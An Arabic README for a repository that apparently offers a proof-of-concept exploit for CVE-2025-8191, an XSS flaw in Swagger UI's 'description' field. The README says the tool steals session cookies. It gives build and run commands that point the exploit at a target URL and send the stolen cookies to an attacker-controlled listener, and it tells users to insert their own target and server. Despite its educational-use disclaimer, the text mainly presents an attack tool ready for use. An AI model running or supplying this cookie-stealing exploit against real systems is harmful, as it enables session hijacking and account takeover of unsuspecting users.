
مستودع يحتوي على استغلال (PoC) لـ CVE‑2025‑8191 في واجهة Swagger UI، يستخدم حقن XSS لاستخراج ملفات تعريف الارتباط الخاصة بالجلسة.
يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال الثغرة CVE‑2025‑8191، وهي ثغرة وجدت في Swagger UI.
تسمح الثغرة بحقن Cross‑Site Scripting (XSS) في حقل “description”، مما يؤدي إلى تنفيذ سكربت عن بعد في إصدارات Swagger UI ≤ 1.0.3.
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v
استبدل http://target.com بعنوان URL المستهدف لـ Swagger UI، و http://yourserver.com بمستمع HTTP الخاص بك لاستخراج البيانات.
هذا الرمز مخصص للأغراض التعليمية والبحث الأمني فقط. لا تستخدمه على أنظمة ليس لديك إذن صريح لاستخدامه. المؤلف غير مسؤول عن أي إساءة استخدام.
رخصة MIT